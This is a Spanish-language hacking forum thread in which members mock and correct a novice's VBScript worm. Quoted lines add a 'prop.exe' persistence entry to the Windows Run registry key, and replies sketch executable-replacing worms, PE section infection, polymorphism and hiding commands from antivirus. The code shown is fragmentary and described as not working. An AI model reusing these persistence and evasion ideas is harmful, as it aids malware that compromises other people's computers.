Hacía tiempo que no veía un código tan chistoso. Es increíble como alguien pueda pensar que eso funcionaría correctamente, sobretodo leyendo la parte de los IF, en los que se hace un CALL a una función. Cuando haces un "cmd.run" estás ejecutando la CMD con el parámetro "/C", bueno hasta aquí estamos bastante claros, pero ¿sabes lo que pasa cuando usas el parámetro /C? estás ejecutando varias veces distintas sesiones del intérprete de comandos, por lo cual, ejecutas las líneas del script por separado y no tienen relación alguna con las que ejecutan despues.
Tampoco el código es una obra maestra...
Citarcmd.run "cmd /c #djkds£êÑÊÀ×ËÎÄÊÀÑÎ×ËäêôŒËÎ×ô¼ŒŠ×ô ", vbHide
Eso fue muy sin sentido...
Citarcmd.run "cmd /c reg delete hklm\software\microsoft\windows\currentversion\run /v prop /f ", vbHide
cmd.run "cmd /c reg add hklm\software\microsoft\windows\currentversion\run /v prop /d "%windir%\prop.exe" ", vbHide
En ese caso, habría sido mejor únicamente sobreescribir al momento de agregar el valor "prop" a "run" usando el parámetro "/f".
Bueno, eso sin mencionar los CALL y los GOTO que saltan a ninguna parte, los ejecutables que no se de donde salieron, etc.
CitarLord RNA podrias enseñarme el code? Es por verlo, si quieres...
Ciertamente no es complicado,
CitarYo hice uno en ASM que suplantaba un ejecutable y guardaba el real en otra parte del disco, cuando dabas doble clic se ejecutaba el worm y lanzaba el programa real
Técnicamente eso sería usar el API "MoveFile" de la librería kernel32.dll, y un "ShellExecute" o "CreateProcess" (para todos los gustos) de la misma librería DLL.
Hmm en cuanto al tema de infección de ejecutables, ya había un ejemplo en el subforo de ASM en esta comunidad... Si no mal recuerdo, hablaba sobre infección agregando una sección llamada ".TLS" en el PE.
Cita de: Space.Medafighter.X en 22 Enero 2011, 21:50 PM
Hacía tiempo que no veía un código tan chistoso. Es increíble como alguien pueda pensar que eso funcionaría correctamente, sobretodo leyendo la parte de los IF, en los que se hace un CALL a una función. Cuando haces un "cmd.run" estás ejecutando la CMD con el parámetro "/C", bueno hasta aquí estamos bastante claros, pero ¿sabes lo que pasa cuando usas el parámetro /C? estás ejecutando varias veces distintas sesiones del intérprete de comandos, por lo cual, ejecutas las líneas del script por separado y no tienen relación alguna con las que ejecutan despues.
Tampoco el código es una obra maestra...
Eso fue muy sin sentido...
En ese caso, habría sido mejor únicamente sobreescribir al momento de agregar el valor "prop" a "run" usando el parámetro "/f".
Bueno, eso sin mencionar los CALL y los GOTO que saltan a ninguna parte, los ejecutables que no se de donde salieron, etc.
Ciertamente no es complicado,
Técnicamente eso sería usar el API "MoveFile" de la librería kernel32.dll, y un "ShellExecute" o "CreateProcess" (para todos los gustos) de la misma librería DLL.
Hmm en cuanto al tema de infección de ejecutables, ya había un ejemplo en el subforo de ASM en esta comunidad... Si no mal recuerdo, hablaba sobre infección agregando una sección llamada ".TLS" en el PE.
PERDÓN ES QUE SOY MUY NUEVO EN ESTOY Y GRACIAS POR TU LECCIÓN.
Igual la idea básica sirve de todos modos es la mejor que por lo menos yo conozco de ocultar por completo un código en linea de comando sin ser detectado por el av.
Hey men no hagas doble post..!!! solo edita el anterior nada mas que eso hay la opcion de editar, modificar mensaje
Aver si entendi. un poco lo que indica Lord y aparte sakapunky creo si se hace por suplantacion es mejor.
Pero si se llega a realizar un Worm que sea capaz de modificarse a si mismo entre los S.0 es decir XP,VISTA y 7 no llegaria a ser mas factible. Un poco de polimorfismo si no estoy mal ..
Espero que alguien me corrija si ando mal.
Cita de: 4ng3r en 5 Enero 2011, 19:02 PM
Yo creo q este espacio no es para ofender y atacarnos es para compartir ideas y expresarlas libremente, la propuesta de morty2 es interesante y me gustaría probarla haber que tal !!! :rolleyes:
funciona en windows7??
saludos
Muchas criticas para ser un proyecto !! ajahaha esta bueno yo te felicito ! pero con el tiempo estoy seguro q podras mejorarlo mucho :D